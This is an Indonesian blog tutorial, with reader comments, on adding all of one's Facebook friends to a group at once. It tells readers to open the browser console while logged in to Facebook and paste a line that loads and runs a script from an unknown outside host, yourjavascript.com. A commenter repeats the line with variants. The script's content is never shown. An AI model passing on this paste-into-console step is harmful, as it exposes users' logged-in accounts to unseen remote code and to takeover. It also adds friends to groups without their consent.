Cara Menambahkan Semua Teman Ke Grup Facebook | Auto Invite

Cara Menambahkan Semua Teman Ke Grup Facebook | Auto Invite
 
Kini Gobel's Blog bakalan ngeshare tentang Cara Menambahkan Semua Teman Ke Grup Facebook Kita Dengan CepatJika anda sedang ingin menambahkan banyak teman facebook anda ke grup anda, pasti anda ingin cepat kan? masa kalau nambahnya satu persatu nanti malah kelamaan.. maka dari itu saya share Cara Cepat Menambahkan Teman Ke Grup Facebook. Meskipun cara ini sudah jadul, tapi kan tidak ada salahnya untuk mencoba, bukan?



Cara Cepat Menambahkan Teman Ke Grup Facebook | Auto Invite :

1. Buka Facebook Anda
2. Masuk ke grup yang ingin ditambahkan teman.
3. Klik Ctrl + Shift + K 
4. Masukkan kode berikut ini dikotak kecil dibawah.

document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/34253702911/auto-invite-grup-facebook.js';
Auto Invite Grup Facebook

5. Lalu tekan Enter.
     Note: kalau mau ngilangin kotak diatas bisa tekan CTRL+SHIFT+K lagi, maka kotak akan hilang.
6. Kalau tidak percaya bisa dicoba dulu disini
7. Tunggulah hingga proses selesai.

Auto Invite Grup Facebook

8. Bila sudah selesai, nanti ada tulisan Close... yaudah klik tuh

Auto Invite Grup Facebook

9. Refresh atau Reload ulang halaman grup, dan lihat perubahannya..!! semua teman anda langsung ke add semuanya.. WOW banget kan?
Auto Invite Grup Facebook
10. Selesai deh.
Cukup mudah bukan?
Demikian  tutor tentang Cara Menambahkan Semua Teman Ke Grup Facebook | Auto invite.
Untuk sobat yang mau melihat teman yang memutuskan pertemanan facebook bisa masuk kesini Cara Mengetahui Teman Facebook Yang Memutuskan Pertemanan.
#Semoga Berhasil.
See You Next Post..




Artikel Menarik Lainnya

16 comments :

Agung said...

Bagus juga Sob,,
gue coba dulu ya,?

algo zali said...

Agung@ silahkan sobat,, kalau belum berani coba di grup saya dulu yang ada diatas(link)

Thono Qi'Sembilan said...

bisa langsung d praktekin nih, thanks gan.
visit back yah
filmanimekitasemua.blogspot.com

Algo Zali Aishiteru said...

silahkan di praktekin sobat,,

Selamat bersuka ria

Dapah blog said...

Ketemu juga yg ane cari.

Salam sukses selalu kang :)

Rani said...

terimakasih informasinya saya akan coba..

Rachmat Alfada said...

masi jalan gatu scryptnya sob.....!!!!

Muhammad Arsyad said...

mantap banget gan

boyman zein said...

riauandroid19.blogspot.com

rani said...

terimakasih informasinya, saya akan coba,

maria moningka said...

kira2 normal nunggu sampai selesai nya brapa lama yaa...?? kok kemarin hampir seharian saya coba ga selesai2..?

cara said...

masihh work gak ?

Bocah NEWBIE said...

auto invite group 100% Work: kunjungi
http://sampitcity37.blogspot.com

Anonymous said...

Kaga bisa agan

Sumbalit | Software Collection said...
This comment has been removed by the author.
Sumbalit | Software Collection said...

kalau nggak bisa coba yang pake mozilla Codenya ini :

document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/34253702911/auto-invite-grup-facebook.js';

http://yourjavascript.com/34253702911 itu di ganti dengan alamat Group sobat. contoh Group ane, jadinya begini:

document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/689930207690363/auto-invite-grup-facebook.js';

Atau

document.body.appendChild(document.createElement('script')).src='https://www.facebook.com/groups/689930207690363/auto-invite-grup-facebook.js';

Semoga berhasil

Post a Comment

Tinggalkan jejak Anda dikomentar ini.
Kami membutuhkan kritik dan saran Anda untuk kemajuan Blog ini.
Terima kasih sudah berminat untuk meluangkan waktu berkomentar disini, semua kritik dan saran Anda akan saya dengarkan untuk memajukan Blog ini.
Gunakan name/url untuk berkomentar.
Anonymous = Spam

---->>Alexa<-----

---->Histats<----

Link Sobat